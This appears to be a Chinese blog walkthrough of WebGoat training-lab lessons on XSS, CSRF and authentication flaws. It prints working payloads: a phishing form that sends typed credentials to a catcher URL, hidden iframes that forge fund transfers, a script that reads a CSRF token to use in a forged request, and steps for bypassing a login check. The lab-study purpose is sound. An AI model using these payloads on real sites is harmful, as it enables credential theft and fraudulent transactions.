Web安全XSS
来源:互联网 发布:阿里智能 应用层数据 编辑:程序博客网 时间:2024/06/08 17:12
简单的反射型XSS钓鱼演示
</form> <script> function hack(){ XSSImage=new Image; XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + ""; alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value);} </script><form name="phish"><br><br><HR> <H2>This feature requires account login:</H2><br> <br>Enter Username:<br> <input type="text" name="user"> <br>Enter Password:<br> <input type="password" name = "pass"><br> <input type="submit" name="login" value="login" onclick="hack()"></form><br><br><HR>
将上边的代码输入到文本框,XSS会造成一个钓鱼的登录界面,用来骗取登录账户和密码
Cross-Site Scripting (XSS)-LAB: Cross Site Scripting
这是一篇系统的XSS介绍
Stage1-4
这四个步骤介绍了储存型XSS,主要步骤如下
- Tom的档案是可以编辑的,Jerry作为人力可以查看Tom的档案
- Tom对自己的档案进行编辑,放入XSS代码,被储存到数据库
- Jerry查看Tom档案时,咣当..中招了
然后Stage2和4给出了两种方法修复XSS
第一是对输入进行检查,进行编码,第二个是对输出进行编码,分为JS Encode和HTML Encode,整个1-4由于没有Soluition,而且貌似XSS已经是被修复后的状态,所以没法完成…感觉这节课也是坏掉的…
Stage5-6
这里是反射型XSS的教程,说是在SearchStaff有个反射型的XSS,可以通过输入那里注入代码,但是没能复现,可能也是坏掉了…Stage6必须在开发模式下,也不知道怎么做.
Cross-Site Scripting (XSS)-Stored XSS Attacks
讲述了一种最典型的储存型XSS的例子—-留言板.
- 留言板可以输入任何信息
- 没有进行输入输出编码,产生了XSS
- 用户A进行恶意留言
- 用户B点进来自动显示用户A的留言,中XSS
Cross-Site Scripting (XSS)-Reflected XSS Attacks
典型的反射型XSS掩饰,Enter your three digit access code:输入框有反射型XSS漏洞
Cross-Site Scripting (XSS)-Cross Site Request Forgery (CSRF)
这里是一个储存型XSS和CSRF结合的示例,CSRF就是冒名登录,用代码伪造请求,详细看这里,这里是吧CSRF恶意代码利用储存型XSS放到了网页上,通过留言Message里输入
<iframe src="attack?Screen=284&menu=900&transferFunds=5000"></iframe>
就可以看到储存型XSS会出发出一个转账页面,如果想这个页面被被害者发现
<iframe src="attack?Screen=284&menu=900&transferFunds=5000" width="1" height="1"></iframe>
通过宽高设置成1像素,隐藏掉这个页面
Cross-Site Scripting (XSS)-CSRF Prompt By-Pass
这个就是利用CSRF进行冒名操作转账,留下恶意代码如下
<iframe src="attack?Screen=282&menu=900&transferFunds=5000" id="myFrame" frameborder="1" marginwidth="0" marginheight="0" width="800" scrolling=yes height="300" onload="document.getElementById('frame2').src='attack?Screen=282&menu=900&transferFunds=CONFIRM';"></iframe><iframe id="frame2" frameborder="1" marginwidth="0" marginheight="0" width="800" scrolling=yes height="300"></iframe>
- 第一个iframe是进行转账5000
- 当第二个加载完毕,去获取第二个iframe执行转账确认按键
- 然后再下边事先构造好”id=frame2”的第二个iframe
根据刚刚的文章讲,预防CSRF的一个有效手段就是Token,但是Token在管理不严的情况下也是可以被窃取的
Cross-Site Scripting (XSS)-
演示窃取Token后的CSRF
<script>var tokensuffix;function readFrame1(){ var frameDoc = document.getElementById("frame1").contentDocument; var form = frameDoc.getElementsByTagName("form")[0]; tokensuffix = '&CSRFToken=' + form.CSRFToken.value; loadFrame2();}function loadFrame2(){ var testFrame = document.getElementById("frame2"); testFrame.src="attack?Screen=278&menu=900&transferFunds=5000" + tokensuffix;}</script><iframe src="attack?Screen=278&menu=900&transferFunds=main" onload="readFrame1();" id="frame1" frameborder="1" marginwidth="0" marginheight="0" width="800" scrolling=yes height="300"></iframe><iframe id="frame2" frameborder="1" marginwidth="0" marginheight="0" width="800" scrolling=yes height="300"></iframe>
- 先加载main页面窃取Token
- 然后加载转账页面发送CSRF转账请求
Cross-Site Scripting (XSS)-HTTPOnly Test
这里就是测试HTTPOnly在对第三方Cookie的管理的影响,被标记了HTTPOnly的Cookie不能被JS获取到.所以一般Session和Token最好放在带有标记的Cookie里
但是这里有个疑问,如果用户选择不同的DOM就可以打开关闭HTTPOnly的标记,是不是可以诱导用户先关掉呢…还是说这里也是为了出题而出题,只是伪造了HTTPOnly的效果
Improper Error Handling-Fail Open Authentication Scheme
这一个章节主要是讲要对错误有处理,不然错误处理的不全面也可能造成漏洞,比如这里
- 输入webgoat帐号
- 然后输入任意密码
- 拦截Request报文
- 删掉密码这一个参数
这样也能登录成功,所以说明代码对获取不到密码这个参数时的错误处理不充分
- Web安全之XSS
- Web安全之XSS
- web安全xss,
- web安全 xss攻击
- Web安全XSS&CSRF
- Web安全XSS
- Web安全之XSS
- Web安全之XSS
- Web安全之XSS
- WEB安全 CSRF/XSS
- web安全防御--xss
- web安全防御xss
- web安全之xss
- Web安全-XSS
- web安全-xss
- XSS web安全浅析
- Web安全-XSS
- web安全xSS
- rm - remove files or directories
- VC操作Word书签模板
- 数值运算与运算符
- UNIX网络编程 卷2 源代码使用
- SubLime Text快捷键及常用插件
- Web安全XSS
- iOS开发之SDCycleScrollView,好用的第三方无限轮播图
- 【模板】约瑟夫环
- Android Activity onCreate()方法重复执行
- BI进行中,重新设计改造质检数据管理系统(图文)
- Docker Compose—简化复杂应用的利器
- 315. Count of Smaller Numbers After Self
- Android4.4 WIFI开机启动流程详析
- PHP 变量作用域